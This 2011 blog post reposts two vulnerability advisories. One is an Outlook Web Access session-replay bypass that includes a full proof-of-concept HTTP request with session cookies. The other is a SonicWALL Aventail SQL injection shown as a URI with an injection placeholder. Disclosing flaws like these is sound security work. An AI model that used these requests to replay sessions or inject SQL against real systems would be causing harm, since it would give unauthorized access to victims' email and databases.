Tuesday, November 22, 2011

Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability

Detail of POC can be viewed
http://www.securityfocus.com/bid/50361

Microsoft Outlook Web Access is prone to a security-bypass vulnerability.

Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account.

Microsoft Outlook Web Access 8.2.254.0 is vulnerable; other versions may also be affected.

An attacker can carry out this attack using readily available network utilities.

The following proof of concept is available:

GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://www.example.com/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3

SonicWALL Aventail 'CategoryID' Parameter SQL Injection Vulnerability

Detail of POC can be viewed
http://www.securityfocus.com/bid/50702
http://www.exploit-db.com/exploits/18122/

SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.


Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]